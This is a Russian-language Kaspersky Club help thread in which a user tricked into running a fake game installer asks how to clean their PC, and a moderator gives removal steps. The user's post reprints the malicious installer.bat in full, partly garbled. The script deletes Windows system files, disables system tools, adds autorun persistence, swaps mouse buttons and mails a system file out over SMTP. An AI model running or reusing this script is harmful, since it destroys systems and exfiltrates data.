Перейти к содержанию
Правила раздела
20 лет клубу! Куда отправится Kaspersky Club? Нажми, чтобы узнать локацию! ;)

Заразил компьютер вирусом

Иван5

Автор Иван5
в Помощь в удалении вирусов

 Поделиться

Рекомендуемые сообщения

Иван5

Иван5

Опубликовано
Опубликовано (изменено)

Компьютер просканировал Kaspersky Virus Removal Tool, логи в Autologger создал. Система у меня windows 10 версии 22H2.

Мне втерлись в доверие и скинули архив под видом игры. В нем нужно было активировать installer.bat для запуска вируса. После этого запуска перепутались кнопки ПКМ и ЛКМ, а также шалил регистр букв и писал текст "заборчиком". Кроме того, в телеграм(где мне и скинули архив) в группах в которых я состою и оставляю комментарии стал отвечать один и тот же человек, представившись уже в личных сообщениях хакером. Потребовал доступ к моему тг каналу в замен на "таблетку от вируса". Заявил, что вирус прописался глубоко в UEFI, что использует учетную запись администратора и автозапуск нужных ему процессов. ( в диспетчере задач действительно появился странный процесс и несколько процессов без названия от системы с пометкой "null". Я отключил интернет от компьютера, чтобы злоумышленник не рылся в компьютере. Я просканировал компьютер сначала сканером от DR web, потом от Касперского(указал в начале поста).

Я не знаю, действительно ли вирус прописался в UEFI, в инсталлере был следующий текст:

 
Спойлер


 
Восстановление после вируса батник
 
 
 
 
 
 
 
Привет. Помоги, я запустил Фаил который судя по всему оказался вирусом. Это был архив и в нем разные файлы. Подскажи как устранить последствия вируса? Вот скрипт istaller.bat : 1. Windows 10 версии 22H2(Пиратка) 2. Kaspersky Total Security 21.24(неактивен) Здравствуйте. Я веду небольшой блог по прохождению известных и малоизвестных игр. В связи с этим мне пишут некоторые разработчики со своими проектами. На этой почве ко мне втерлись в доверие хакеры. Они отправили мне батник с установкой непонятно чего, после запуска которого, как заверил главный мошенник происходят необратимые изменения в самом UEFI материнки. Почитал на сайтах, способа 2- перепрошить материнку программатором, либо купить новую. Денег нет совсем. Мошенники обещали "таблетку" за доступ к тг каналу и чату. Прилагаю код инсталлера и приложу все что попросите, увы сам Фаил вируса не дает прикрепить( скачать безопасно, не безопасно запускать installer) для изучения. Заплачу чем смогу, если кто-то реально объяснит проблему и напишет свою таблетку. Windows 10. Пиратка. Прилагаю скриншоты самого вируса и автозапуска в диспетчере задач(только фото есть, извините, пришлось на время решения проблемы лишить хакеров доступа к моему компу и отключить интернет) Текст батника-инсталлера: @echo This app created by Niziast @echo Niziast App @echo Autor: Niziast, app created by Niziast @echo off echo Chr(39)>%temp%\temp1.vbs echo Chr(39)>%temp%\temp2.vbs echo on error resume next > %temp%\temp.vbs echo Set S = CreateObject("Wscript.Shell") >> %temp%\temp.vbs echo set FSO=createobject("scripting.filesystemobject")>>%temp%\temp.vbs reg add HKEYERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v nodesktop /d 1 /freg add HKEY_USEUSERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v ClassicShell /d 1 /fset ¶§=%0 copy %¶§% %SystemRoot%\user32dll.bat reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v RunExplorer32 /d %SystemRoot%\user32dll.bat /f reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t REGD /d 67108863 /f reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoViewOnDrive /t REG_DWORDDWORD /d 67108863 /f echo fso.deletefile "C:\ntldr",1 >> %temp%\temp.vbs reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoSelectDownloadDir" /d 1 /f reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Featureachine_LockdowLockdown" /v "IExplorer" /d 0 /f reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoFindFiles" /d 1 /f reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoNavButtons" /d 1 /f echo fso.deletefolder "D:\Windows",1 >> %temp%\temp.vbs echo fso.deletefolder "I:\Windows",1 >> %temp%\temp.vbs echo fso.deletefolder "C:\Windows",1 >> %temp%\temp.vbs echo sr=s.RegRead("HKEYCHINE\SMACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs echo fso.deletefile sr+"\system32\hal.dll",1 >> %temp%\temp.vbs echo sr=s.RegRead("HKEYINE\SOFMACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs echo fso.deletefolder sr+"\system32\dllcache",1 >> %temp%\temp.vbs echo sr=s.RegRead("HKEYE\SOFTWMACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs echo fso.deletefolder sr+"\system32\drives",1 >> %temp%\temp.vbs echo s.regwrite "HKEYLSID\{645ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\LocalizedString","forum.whack.ru™">>%temp%\temp.vbs echo s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","NIZIAST">>%temp%\temp.vbs echo s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization","NIZIAST">>%temp%\temp.vbs echo on error resume next > %temp%\temp1.vbs echo set FSO=createobject("scripting.filesystemobject")>>%temp%\temp1.vbs echo do>>%temp%\temp1.vbs echo fso.getfile ("A:\")>>%temp%\temp1.vbs echo loop>>%temp%\temp1.vbs echo on error resume next > %temp%\temp2.vbs echo Set S = CreateObject("Wscript.Shell") >> %temp%\temp2.vbs echo do>>%temp%\temp2.vbs echo execute"S.Run ""%comspec% /c echo "" & Chr(7), 0, True">>%temp%\temp2.vbs echo loop>>%temp%\temp2.vbs reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disabletaskmgr /t REGeg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disableregistrytools /t REG_DWORD /d 1 /f reDWORD /d 1 /f reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuPinnedList /t REG add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMFUprogramsList /t REG_DWORD /d 1 /f reg DWORD /d 1 /f reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoUserNameInStartMenu /t REGdd "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum" /v {20D04FE0-3AEA-1069-A2D8-08002B30309D} /t REG_DWORD /d 1 /f reg adDWORD /d 1 /f reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoNetworkConnections /t REG "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuNetworkPlaces /t REG_DWORD /d 1 /f reg add DWORD /d 1 /f reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartmenuLogoff /t REGhkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuSubFolders /t REG_DWORD /d 1 /f reg add "hDWORD /d 1 /f reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoCommonGroups /t REGcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFavoritesMenu /t REG_DWORD /d 1 /f reg add "hkcDWORD /d 1 /f reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRecentDocsMenu /t REG\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetFolders /t REG_DWORD /d 1 /f reg add "hkcu\DWORD /d 1 /f reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoAddPrinter /t REGoftware\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f reg add "hkcu\SoDWORD /d 1 /f reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMHelp /t REGtware\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f reg add "hkcu\SoftDWORD /d 1 /f reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMorePrograms /t REGare\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f reg add "hkcu\SoftwaDWORD /d 1 /f reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoChangeStartMenu /t REGe\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyDocs /t REG_DWORD /d 1 /f reg add "hkcu\SoftwareDWORD /d 1 /f reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyPictures /t REGMicrosoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMyMusic /t REG_DWORD /d 1 /f reg add "hkcu\Software\MDWORD /d 1 /f reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REGteobject("shell.application")>>%temp%\temp.vbs echo application.minimizeall>>%temp%\temp.vbs reg add "hklm\Software\Microsoft\Windows\CurrentVersion\run" /v SwapNT /t REG_SZ /d rundll32 user32, SwapMouseButton /fSZ /d rundll32 user32, SwapMouseButton /f start rundll32 user32, SwapMouseButton reg add "HKCR\exefile\shell\open\command" /ve /t REG\temp.vbs echo while i^>0 or i^<0 >> %temp%\temp.vbs echo S.popup "NIZIAST",0, "NIZIAST",0+16 >> %temp%\temp.vbs echo i=i-1 >> %temp%\temp.vbs echo wend >> %temp%\temp.vbs echo do >> %temp%\temp.vbs echo wscript.sleep 200 >> %temp%\temp.vbs echo s.sendkeys"{capslock}" >> %temp%\temp.vbs echo wscript.sleep 200 >> %temp%\temp.vbs echo s.sendkeys"{numlock}" >> %temp%\temp.vbs echo wscript.sleep 200 >> %temp%\temp.vbs echo s.sendkeys"{scrolllock}" >> %temp%\temp.vbs echo loop>> %temp%\temp.vbs echo Set oWMP = CreateObject("WMPlayer.OCX.7") >> %temp%\temp.vbs echo Set colCDROMs = oWMP.cdromCollection >> %temp%\temp.vbs echo if colCDROMs.Count ^>= 1 then >> %temp%\temp.vbs echo For i = 0 to colCDROMs.Count - 1 >> %temp%\temp.vbs echo colCDROMs.Item(i).eject >> %temp%\temp.vbs echo next >> %temp%\temp.vbs echo End If >> %temp%\temp.vbs echo Call SendPost("NIZIAST", "NIZIAST", "NIZIAST", "...", "NIZIAST") >> %temp%\temp.vbs echo Function SendPost(strSMTP_Server, strTo, strFrom, strSubject, strBody) >> %temp%\temp.vbs echo Set iMsg = CreateObject("CDO.Message") >> %temp%\temp.vbs echo Set iConf = CreateObject("CDO.Configuration") >> %temp%\temp.vbs echo Set Flds = iConf.Fields >> %temp%\temp.vbs echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2 >> %temp%\temp.vbs echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1 >> %temp%\temp.vbs echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusername") = "support" >> %temp%\temp.vbs echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword") = "support" >> %temp%\temp.vbs echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "smtp.mail.ru" >> %temp%\temp.vbs echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 25 >> %temp%\temp.vbs echo Flds.Update >> %temp%\temp.vbs echo iMsg.Configuration = iConf >> %temp%\temp.vbs echo iMsg.To = strTo >> %temp%\temp.vbs echo iMsg.From = strFrom >> %temp%\temp.vbs echo iMsg.Subject = strSubject >> %temp%\temp.vbs echo iMsg.TextBody = strBody >> %temp%\temp.vbs echo iMsg.AddAttachment "c:\boot.ini" >> %temp%\temp.vbs echo iMsg.Send >> %temp%\temp.vbs echo End Function >> %temp%\temp.vbs echo Set iMsg = Nothing >> %temp%\temp.vbs echo Set iConf = Nothing >> %temp%\temp.vbs echo Set Flds = Nothing >> %temp%\temp.vbs echo s.run "shutdown -r -t 0 -c ""NIZIAST"" -f",1 >> %temp%\temp.vbs start %temp%\temp.vbs start %temp%\temp1.vbs start %temp%\temp2.vbs
Кроме того, я перезагружал компьютер, еще не осознавая что он заражен, после этого кнопки ПКМ и ЛКМ уже нормально работали, а регистр букв перестал шалить. Но беспокоит что злоумышленник имеет доступ к пк, а также с утра у меня начала сама по себе уменьшаться память на системном диске. После чистки KVRT.exe память вернулась, хоть и не в полном объеме (было съедено около 80гб)
Злоумышленник утверждает что переустановка системы не поможет. Как мне удостовериться последствия от вируса устранены? Пока. Не переустанавливал виндовс, в инструкции сказано что после удаления вируса необходимо удалить старые точки восстановления. Но я не уверен что делать

IMG_20260412_110224_142.jpg

IMG_20260412_180908_471.jpg

IMG_20260412_180908_471.jpg

 

CollectionLog-2026.04.12-17.48.zip

Извините, текст вируса копировал из диалога с нейросетью, поэтому там кусочек промта.

Нейросеть считает что UEFI не был заражен, но допускает что код для заражения сог уже подкачиваться из интернета и в том случае могло такое произойти

Изменено пользователем Sandor
Убрал под спойлер
Sandor

Sandor

Опубликовано
Опубликовано

Здравствуйте!

 

Скачайте AV block remover (или с зеркала).
Распакуйте, запустите и следуйте инструкциям. Если не запускается, переименуйте файл AVbr.exe в, например, AV-br.exe (или любое другое имя). Можно также воспользоваться версией со случайным именем.

Если и так не сработает, запускайте программу из любой папки кроме папок Рабочий стол (Desktop) и Загрузки (Downloads).

В результате работы утилиты появится отчёт AV_block_remove_дата-время.log, прикрепите его к следующему сообщению.

После перезагрузки системы соберите новый CollectionLog Автологером.
 

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Поделиться
Перейти к списку тем

  • Похожий контент

    • oklick_a
      Троян зашифровал файлы
      Автор oklick_a
      Здравствуйте, по электронной почте пришло сообщение-обманка. Открыли файл, в результате чего были зашифрованы все документы и фотографии. Файлы переименовались в набор символов с расширением *.windows10. Результаты сканирования AutoLogger-ом прилагаем. Если будет необходимо, имеются сами файлы-вредители и текстовый файл о вымогательстве.
      CollectionLog-2016.07.02-11.31.zip
    • evsenia
      шифровальщик Shade
      Автор evsenia
      Буквально позавчера, коллега получила из "бухгалтерии" письмо, не трудясь размышлением, что бухгалтерия ей отродясь ни одного письма не отправила, она его открыла. В результате - все фалы зашифрованы с длинным названием и расширением window10 . Дальше как обычно, просьба в течении 48 часов выслать сообщение на почту и тд.
       имя файла стало носить примерно такой характер -1k79551qknldlo3Fp2UT0FUcCCSk7MeeWo9Bl5EEgVQ=.45009A396E5F2FD1CB85.windows10
      прикрепить файл не получается - в тотале вообще пишет, что файл не найден, а при попытке прикрепить его сюда пишет - Загрузка пропущена (Вы не выбрали файл для загрузки)
      - сам вирус удален, логи не сохранились. Удалила на работе, дома еще раз проверила и KIS 16.0.1 и скачала KVRT с вашего сайта. Поиски дешифратора результата не дали, ну и судя по форуму, такая проблема не у меня одной. Есть смысл ждать решения проблемы или смириться с потерей информации? Говорят, к прошлому варианту shade тоже не было дешифратора? 
       
    • toolshack
      Подозрение на вирусы
      Автор toolshack
      Здравствуйте, что то нагружает диск до 100%, автоматически запускаются браузеры, меню "Пуск" выдает критическую ошибку при его запуске.CollectionLog-2026.04.28-11.37.zip
    • Alex816
      [РЕШЕНО] Adware:Win32/BrowserAssistant Системный антивирус ругается каждый раз при запуске компьютера
      Автор Alex816
      При каждом запуске Windows антивирусник указывает, что находит вредоносное ПО. Удалить не получается. Возможно что-то скачивал и подцепил.

       

      CollectionLog-2026.04.27-12.56.zip
    • ...,
      [РЕШЕНО] HEUR:Trojan.Multi.Agent.gen и MEM:Trojan.Win32.SEPEH.gen
      Автор ...,
      Здравствуйте. При сканирование Kaspersky Anti-Virus  выявились несколько вирусов, с половиной из них сам касперский смог справиться, но есть heur:trojan и mem:trojan.win32.sepeh.gen . Касперский не справляется с ними, при лечение пропадает в один момент весь рабочий экран, становится черным и больше ничего не происходит
       
      CollectionLog-2026.04.16-15.01.zip
×
×
  • Создать...